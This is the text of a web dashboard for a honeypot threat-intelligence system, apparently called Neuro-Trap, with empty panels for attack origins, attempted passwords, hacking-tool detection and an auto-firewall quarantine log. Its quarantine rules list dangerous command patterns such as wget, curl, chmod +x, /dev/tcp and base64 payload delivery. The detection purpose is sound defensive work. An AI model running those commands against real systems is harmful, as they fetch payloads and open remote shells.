Loading live threat feed...

NEURO-TRAP

AI-Powered Cyber Immune System — Threat Intelligence Network

SYSTEM ACTIVE — ALL SENSORS ONLINE
🔴 ATTACKS INTERCEPTED 🌍 COUNTRIES DETECTED 🕸️ UNIQUE ADVERSARIES
Critical Incidents
Active Threats
Unique Adversaries
Tracking
Top Target Vector
Username
Most Breached Key
Password
📊 THREAT VECTORS (Event Types)

Real-time classification of every intercepted event — connections, login attempts, commands, and system alerts.

🌍 GLOBAL ATTACK ORIGINS (3D INTERACTIVE • SCROLL ZOOM • CLICK ATTACKERS)
🗺️ TOP ATTACKING COUNTRIES

GeoIP-resolved origins of attackers — showing which nations generate the most hostile traffic against the honeypot.

📈 ATTACK VELOCITY (LAST 24 HOURS)

Hourly attack frequency showing when adversaries are most active — spikes indicate coordinated scanning campaigns.

🎯 TOP ATTACKING IPs — (Click any IP to Inspect)
🔑 BREACHED CREDENTIALS
🔐 TOP PASSWORDS
☁️ CREDENTIAL WORDCLOUD (Size = frequency of password attempts)
🏢 TOP ISPs ATTACKING
⚔️ MITRE ATT&CK STAGES
🏗️ INFRA CLASSIFICATION
🧬 CYBER IMMUNE SYSTEM

Just like a biological immune system identifies and neutralizes pathogens, Neuro-Trap classifies, profiles, and quarantines digital threats in real-time.

🦠 Pathogens Detected
0
Unique Threat Actors
💉 Antibodies Active
0
Counter-Intel Profiles
🔴 Quarantined
0
Auto-Firewall Blocks
⏱ Avg Session
0s
Deception Hold Time
⚠️ THREAT LEVEL DISTRIBUTION

AI classifies each attacker's danger level based on commands executed, dangerous tools used, and login attempts.

🔧 DETECTED HACKING TOOLS (Click a bar to filter profiles)

Signature-based detection of offensive tools used by attackers — identified from SSH client banners, HTTP user-agents, command patterns, and threat intelligence reports.

🔍 HOW TOOL DETECTION WORKS
📡 SSH Client Banner — tool name embedded in SSH handshake (e.g. libssh, ZGrab) 🌐 HTTP User-Agent — scanner identifies itself in HTTP headers (e.g. Masscan, Nikto) ⌨️ Shell Commands — commands typed in honeypot shell (wget, nmap, curl, netcat) 🛡️ Threat Feed Events — honeypot's own IDS flags known scanner signatures
🧬 DEVICE FINGERPRINT CLUSTERING — ATTACKER ATTRIBUTION (Same device caught across multiple IPs)

Even when attackers rotate IPs using VPNs, TOR, or botnets, their SSH client binary leaves an identical fingerprint. Neuro-Trap groups these into device clusters — proving attribution across IP rotation.

🧬 Device Clusters
0
Multi-IP Devices Detected
🌐 Linked IPs
0
Total IPs in Clusters
🔴 Largest Cluster
0
IPs from One Device
🔗 MULTI-IP DEVICE CLUSTERS (One device → many IPs = VPN hopping / botnet nodes)
#Device DNASSH Client / ToolIPs DetectedTotal LoginsCommandsThreatTools Used
🔴 QUARANTINE RULES — Why Is An IP Blocked?
3+ Failed Logins → Automatically quarantined by auto-firewall (brute-force detected)
Dangerous Commands → wget, curl, chmod +x, /dev/tcp, base64 payload delivery detected
Active Shell Session → 5+ commands executed inside honeypot shell
Monitoring Only → Connected but below threshold — still profiled for intelligence
🔬 PATHOGEN PROFILES — LIVE ATTACKER INTELLIGENCE (Click any card to run OSINT scan)

Each attacker is profiled like a biological pathogen — DNA fingerprinted, behaviorally classified, and ranked by recency. Most recent activity is shown first.

SORT BY: 🕐 Most Recent ⚠️ Threat Level 💻 Most Commands 🔴 Quarantined First
Page 1 of 1
🛡️ WHITE BLOOD CELLS — AUTO-FIREWALL QUARANTINE LOG

IPs are automatically quarantined after 3 or more failed login attempts. This mimics white blood cells neutralizing pathogens that repeatedly try to breach the immune barrier. IPs with fewer than 3 attempts are still profiled and monitored but not yet quarantined.

IP AddressTotal AttemptsQuarantine ReasonStatusAction
🔁 LIVE ATTACK REPLAY (FORENSIC EVIDENCE PLAYBACK)

Watch exactly what the hacker typed, command by command, in real-time. Every keystroke was captured by Neuro-Trap's deception engine. Click any IP in the session to run a full OSINT intelligence scan.

Select Evidence Recording
Select an evidence recording above and press ▶ PLAY to begin forensic playback.
📜 TERMINAL INTERCEPT LOGS
TimestampEventIPMessageDetails